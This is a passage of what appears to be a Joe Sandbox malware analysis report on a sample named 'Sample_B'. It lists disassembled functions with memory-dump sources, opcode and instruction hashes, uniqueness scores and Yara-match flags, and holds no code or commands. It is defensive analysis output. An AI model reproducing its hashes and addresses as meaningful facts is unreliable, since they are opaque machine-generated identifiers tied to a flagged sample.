                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: afe8d0ecdcaea39f8c30042fb237950ae7ae6b275f357d6908a5baf7e84f9437
                                                                                  • Instruction ID: d0902bff7530c04af7cc9bb3caca7381d941d037b267de9dacf870a755c8ef0d
                                                                                  • Opcode Fuzzy Hash: afe8d0ecdcaea39f8c30042fb237950ae7ae6b275f357d6908a5baf7e84f9437
                                                                                  • Instruction Fuzzy Hash: 7DF08270D412099BDB589FA9C86A7FFBEF4AB49300F10682AD400B3280DA745948CBE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00550798, Relevance: .0, Instructions: 31COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9d3dc012acac435e46bd521e49023c80bc9de08216fba279c650b4eefced05f5
                                                                                  • Instruction ID: 9489e0de08681e65cba628ac2781002ee3ca44a029c4ff36ac6e52be0d0e0f40
                                                                                  • Opcode Fuzzy Hash: 9d3dc012acac435e46bd521e49023c80bc9de08216fba279c650b4eefced05f5
                                                                                  • Instruction Fuzzy Hash: FDF0823480A398DFCB06DB7494555D87FB0AF46301F2090E7C844972A2E6311E4ADB52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00A80A40, Relevance: .0, Instructions: 31COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076139871.0000000000A80000.00000040.00000040.sdmp, Offset: 00A80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_a80000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e97997a94c4c79ed3d81e1b5408e06104f0e3360e17351575fbe2cd674f02ae7
                                                                                  • Instruction ID: acb651935c8e83942a390d04cea1e56cb19635ca6cd53ece9adeac6fdfea4bda
                                                                                  • Opcode Fuzzy Hash: e97997a94c4c79ed3d81e1b5408e06104f0e3360e17351575fbe2cd674f02ae7
                                                                                  • Instruction Fuzzy Hash: E7F0F635108644DFC316CB14D940F15FBA2EB89718F24C6ADE9891B662C737A813DB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00551530, Relevance: .0, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 34a1492a2718c499d77c2f2567af876d6d4315b865e127e2682eacd96a6630b9
                                                                                  • Instruction ID: ac97a68f76569f4d8d8bc06b0d770cae7bb1b6d1cb2ba558bbf953c7702e6ebd
                                                                                  • Opcode Fuzzy Hash: 34a1492a2718c499d77c2f2567af876d6d4315b865e127e2682eacd96a6630b9
                                                                                  • Instruction Fuzzy Hash: D4F03074901108DFC708EFB4D559A6DBBB1EF82202F2010A8D40533361DF706E48CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00A8081E, Relevance: .0, Instructions: 27COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076139871.0000000000A80000.00000040.00000040.sdmp, Offset: 00A80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_a80000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 81527ac938b866d001a8fdea7e4f70350590362e3109b6be105e069903bff4d1
                                                                                  • Instruction ID: fb823bd0d7aa4432b32bf71eca5c21ec6054410fe3be28a9e64dcb5e8b1e725a
                                                                                  • Opcode Fuzzy Hash: 81527ac938b866d001a8fdea7e4f70350590362e3109b6be105e069903bff4d1
                                                                                  • Instruction Fuzzy Hash: D9E09276A407008BEB50CF0AEC41452F7D4EB84A30B08C07FDC0D8B700D136B504CAA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00550748, Relevance: .0, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b891a5e1b3111f0c9262d602c9adab5fa8d505fc61222a77ca1bac6a33b8cebd
                                                                                  • Instruction ID: 1f4d4a96ec993ae64df20edd17bd8a136b5dd2e9bf65f70d24edcfd14f3c83be
                                                                                  • Opcode Fuzzy Hash: b891a5e1b3111f0c9262d602c9adab5fa8d505fc61222a77ca1bac6a33b8cebd
                                                                                  • Instruction Fuzzy Hash: D2F01574C02208DFCB04EFB4E5485AEBBB4FB0A306F5059A9C81063350D7359A40CF84
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00553E60, Relevance: .0, Instructions: 22COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dc9306ed6b75f13fd3b3c8eb9aa064ec0b4d2d47629975f5196d275397f3808f
                                                                                  • Instruction ID: 5252a17e0ed0d9e01aefa09176f933e0d5d13bcc47ca4640d9539b47e17f069d
                                                                                  • Opcode Fuzzy Hash: dc9306ed6b75f13fd3b3c8eb9aa064ec0b4d2d47629975f5196d275397f3808f
                                                                                  • Instruction Fuzzy Hash: 7AE04638952208DFCB04EFA4D6899ADBBB4BF46301F2011E9DC4463761DB30AE58CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00550280, Relevance: .0, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4c21b13f02cad51066166f2417e20c537a34197b0a17ecf3419c2930bf80a364
                                                                                  • Instruction ID: d9ed58aadef080c62e51099c37521759ea623a6cc44a6d200e0caeef4befea78
                                                                                  • Opcode Fuzzy Hash: 4c21b13f02cad51066166f2417e20c537a34197b0a17ecf3419c2930bf80a364
                                                                                  • Instruction Fuzzy Hash: 42E04F38906208DBCB18EFA4E54899CBBF5BB45302F1050AACC4553350D7315E48DB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0055013E, Relevance: .0, Instructions: 18COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7404125742d4321a6697e90d518a2800e420c2bdbad6139f65f648e1b30babca
                                                                                  • Instruction ID: a1755f0b1a6e94ba3913b465c1764e920b3db76db74dda5111db9f9fcb5ffe81
                                                                                  • Opcode Fuzzy Hash: 7404125742d4321a6697e90d518a2800e420c2bdbad6139f65f648e1b30babca
                                                                                  • Instruction Fuzzy Hash: B5D01736D01208CBCB008FA8E4882EDFBB0FB8A329F209826C614B3250C3318445CF54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00553E28, Relevance: .0, Instructions: 17COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4b2131c4f2219cfd728c7948963e9bae0fd257a63793e03e90ba8ff6d3cd3aff
                                                                                  • Instruction ID: 96cf7e0a08974883f649e13721855ea6d1e315ec2bdb8ae5a4948a4758309622
                                                                                  • Opcode Fuzzy Hash: 4b2131c4f2219cfd728c7948963e9bae0fd257a63793e03e90ba8ff6d3cd3aff
                                                                                  • Instruction Fuzzy Hash: ECD0A731843208DBC709EFA0D50562AB379A703201F5010A8C804236408775AE14C699
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0055011D, Relevance: .0, Instructions: 15COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1f366807c561f1199c503da5f976c16f1dfdeb7020969111e661933a8910f428
                                                                                  • Instruction ID: c2f907b17b2e2939a38f8d8365debc05ab922426882bf15c21f14c7fe8617844
                                                                                  • Opcode Fuzzy Hash: 1f366807c561f1199c503da5f976c16f1dfdeb7020969111e661933a8910f428
                                                                                  • Instruction Fuzzy Hash: 41D0C93AE01208CFCB008FE8F4841DCF771EB8E229F209566C614B3250C7319855CF54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 002723F4, Relevance: .0, Instructions: 15COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075644490.0000000000272000.00000040.00000001.sdmp, Offset: 00272000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_272000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a5caa1de5f72a6797f6afeaa1e9601ec6769a7fc61da9fafa1fb293ece455229
                                                                                  • Instruction ID: 804fc76ef16f416331efc28e9400a0f39df3c7009c176d1773cc601fdfdf41a7
                                                                                  • Opcode Fuzzy Hash: a5caa1de5f72a6797f6afeaa1e9601ec6769a7fc61da9fafa1fb293ece455229
                                                                                  • Instruction Fuzzy Hash: C0D05E79214A92CFD7168E1CC1A4B9537D4AB51B04F4684F9E804CB6A3C778E995D200
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 002723BC, Relevance: .0, Instructions: 14COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075644490.0000000000272000.00000040.00000001.sdmp, Offset: 00272000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_272000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 68669ba90e0bd945556a9029ad9bb62b1fede4aa54c04fb9fcecedd47d595bde
                                                                                  • Instruction ID: d4fdc04ea822915b5b6381e0a9102d83ce9e04ed710e03fbb65e24263130e06d
                                                                                  • Opcode Fuzzy Hash: 68669ba90e0bd945556a9029ad9bb62b1fede4aa54c04fb9fcecedd47d595bde
                                                                                  • Instruction Fuzzy Hash: 4FD05E343106828BDB15CE0CC294F5973E4AB40700F0684ECFC048B266C3B8EC94C600
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Function 00BCCF92, Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: |=D$|=D
                                                                                  • API String ID: 0-3402754993
                                                                                  • Opcode ID: ab2dc095ae55c859755239602a46c3e7fa7984128b366afd088b67f6203d8fcb
                                                                                  • Instruction ID: 925e45eca7199ac4bd29ac13c254666291b8fc39c6a198b7b3b5d41be48a9c5f
                                                                                  • Opcode Fuzzy Hash: ab2dc095ae55c859755239602a46c3e7fa7984128b366afd088b67f6203d8fcb
                                                                                  • Instruction Fuzzy Hash: C9D1FF7BE146518BD714CFAAFCC010A73A3ABAA310B5B8660CB1567361D374BA13CBC4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00BDAFA6, Relevance: 1.4, Strings: 1, Instructions: 195COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: UUUU
                                                                                  • API String ID: 0-1798160573
                                                                                  • Opcode ID: 2d5baa18514cc11666b5d58127a1aa11a746746b246e3db812331feeade6b9e9
                                                                                  • Instruction ID: b7bd9134e592bb5a5285b317cb19094bd2f515e9b91c3b01707a55bbf1581a97
                                                                                  • Opcode Fuzzy Hash: 2d5baa18514cc11666b5d58127a1aa11a746746b246e3db812331feeade6b9e9
                                                                                  • Instruction Fuzzy Hash: 4E51D133B208610BE74CCA6D8C653696A9387C9350B1E867DDA96D73C2DEB8D912C284
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00BCD426, Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: UUUU
                                                                                  • API String ID: 0-1798160573
                                                                                  • Opcode ID: f341a98deb1e5e92d7066587e62b77daad1dfda02a02c613fc9f81484624d4c1
                                                                                  • Instruction ID: 790960dc826ba515f374304ad24127e13dcb39a36aeb02f86586815ec94b777a
                                                                                  • Opcode Fuzzy Hash: f341a98deb1e5e92d7066587e62b77daad1dfda02a02c613fc9f81484624d4c1
                                                                                  • Instruction Fuzzy Hash: BF21FC323705150BF79CE9398C1376B62D2DBC8264B18CA3DA6A6C72C1ED6CD9578285
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00C06AF4, Relevance: .6, Instructions: 609COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b9f171fb69ca0f2ed4c3d19914428b9defe5770a552cf6ecd2dc7c4246d8a682
                                                                                  • Instruction ID: 34508bf953ddc7c0248ab9a9e4fbf7a4b1afa786f96444d3a9a216bd6f8ff86a
                                                                                  • Opcode Fuzzy Hash: b9f171fb69ca0f2ed4c3d19914428b9defe5770a552cf6ecd2dc7c4246d8a682
                                                                                  • Instruction Fuzzy Hash: 54423671900249DFDF29CF68C881AA97BB1FF08314F14825AFD699B291D735E9A1DF80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00BD7646, Relevance: .6, Instructions: 595COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
                                                                                  • Instruction ID: 8e3ad788e2b47047ad7c21b66b362804302468dbbdc0c1ed7242a88a839864d8
                                                                                  • Opcode Fuzzy Hash: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
                                                                                  • Instruction Fuzzy Hash: FC42D5B7E403299FCB14CFD5C8C0589F7B2BFD8314B1B95958918BB216D2B4BA468BD0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00C2ABFC, Relevance: .6, Instructions: 595COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
                                                                                  • Instruction ID: 8e3ad788e2b47047ad7c21b66b362804302468dbbdc0c1ed7242a88a839864d8
                                                                                  • Opcode Fuzzy Hash: b84eadeceb15b833d74a6b3ddcf4bdaa302aef256980365e51470e07e4227508
                                                                                  • Instruction Fuzzy Hash: FC42D5B7E403299FCB14CFD5C8C0589F7B2BFD8314B1B95958918BB216D2B4BA468BD0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00BCED03, Relevance: .4, Instructions: 415COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 39dbe2aba88f9d11811e4dc6aa70dbdabafb0b3b74fa8fdf164f418612883361
                                                                                  • Instruction ID: 00b926c5f6c5bdb413bece2416ce306270ca5ffdb79c294c1c9a6dc1759d0aa4
                                                                                  • Opcode Fuzzy Hash: 39dbe2aba88f9d11811e4dc6aa70dbdabafb0b3b74fa8fdf164f418612883361
                                                                                  • Instruction Fuzzy Hash: 32022875900229DBDB64CFA5C884BEDB7F6FF48310F1481EEE859AB241D7349A85CB90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00C23DC0, Relevance: .3, Instructions: 346COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 496059e9654bb4327c1537d59ae9fcba2d088ba81316330b2626cae3cb6d61c4
                                                                                  • Instruction ID: d980fd519f7c95dad6e5be18ea2ace6cbd8530520ef98c255d4656d11be0e8ee
                                                                                  • Opcode Fuzzy Hash: 496059e9654bb4327c1537d59ae9fcba2d088ba81316330b2626cae3cb6d61c4
                                                                                  • Instruction Fuzzy Hash: 10A1AF37BA4B0907E30889EAACC6394B5C397D8354F6E423D8B75C73D2E9FC99168194
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00BCD523, Relevance: .2, Instructions: 206COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7264ef9a1d20c920f4940a67a8554791b0b24340ae4dd46b09b0a5d526564939
                                                                                  • Instruction ID: e8b1470122b08f5c9c7f023ca67470f4b4ebd96add8a54f611aeb69a2c908a50
                                                                                  • Opcode Fuzzy Hash: 7264ef9a1d20c920f4940a67a8554791b0b24340ae4dd46b09b0a5d526564939
                                                                                  • Instruction Fuzzy Hash: 9D719E759141A58FCB0ACF6D88A01BDFFF4EF5A20072445AED8E2E7342D6744A12CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00BDD5AE, Relevance: .2, Instructions: 169COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bc3cff37084f2d0a492ca6bb6b1919cd8870f06ce0428e5eb89ecad11dcb3b00
                                                                                  • Instruction ID: 3b81052f9ad4e8102e2952e3eba61bc8067273df4ae5f140bc5eab97f9ea483e
                                                                                  • Opcode Fuzzy Hash: bc3cff37084f2d0a492ca6bb6b1919cd8870f06ce0428e5eb89ecad11dcb3b00
                                                                                  • Instruction Fuzzy Hash: BA51F2B2A106159BE75CCF5AC865269FFE2EBD1305B18C1BED1E7C7380D6749502EB10
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005519B0, Relevance: .1, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 537b80e03f894516b01569de0a92b02072133c8835f2cfb5ca97e1c6ee951038
                                                                                  • Instruction ID: 02e37f7446ee2e71a0a46c208a4c51749b7485b48476e9a0100131c1e93f6dc6
                                                                                  • Opcode Fuzzy Hash: 537b80e03f894516b01569de0a92b02072133c8835f2cfb5ca97e1c6ee951038
                                                                                  • Instruction Fuzzy Hash: F321F334D02209DFCB04EFA4C454BEDBBB2BB46301F6084AAD8046B391CB349E84CBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00BCD6C4, Relevance: .1, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a778d8f3d317d4595d7e58257667705a339ae63e4ead4c8d772323d500440465
                                                                                  • Instruction ID: 4060e8121907f3d521ae3a9028bf7e0b739e937bcf58a0e58c8f235aeaf0907f
                                                                                  • Opcode Fuzzy Hash: a778d8f3d317d4595d7e58257667705a339ae63e4ead4c8d772323d500440465
                                                                                  • Instruction Fuzzy Hash: 58115B2570A2C5CFCB4FC66D54D15ACBFD2EAEB00039846D8C986EF38BC4644919CBB2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00C23D2F, Relevance: .0, Instructions: 48COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
                                                                                  • Associated: 00000000.00000002.2076275533.0000000000C42000.00000002.00020000.sdmp Download File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_bc0000_Sample_B.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c80bb9cdb2e80480a53bbd02fdae8663ef8cbc0f65f40fb67fd823d7247ba4f9
                                                                                  • Instruction ID: 853540c2d2ccf7b22470551781f30321890aec58ad34d5d470c86a11d9dd0be3
                                                                                  • Opcode Fuzzy Hash: c80bb9cdb2e80480a53bbd02fdae8663ef8cbc0f65f40fb67fd823d7247ba4f9
                                                                                  • Instruction Fuzzy Hash: BB01BC767206068FD308CFA9FCC0A66B3A2FBD935170A8538DA01C3276DB34F520CA54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00C23CBE, Relevance: .0, Instructions: 46COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2076193256.0000000000BC0000.00000002.00020000.sdmp Download File
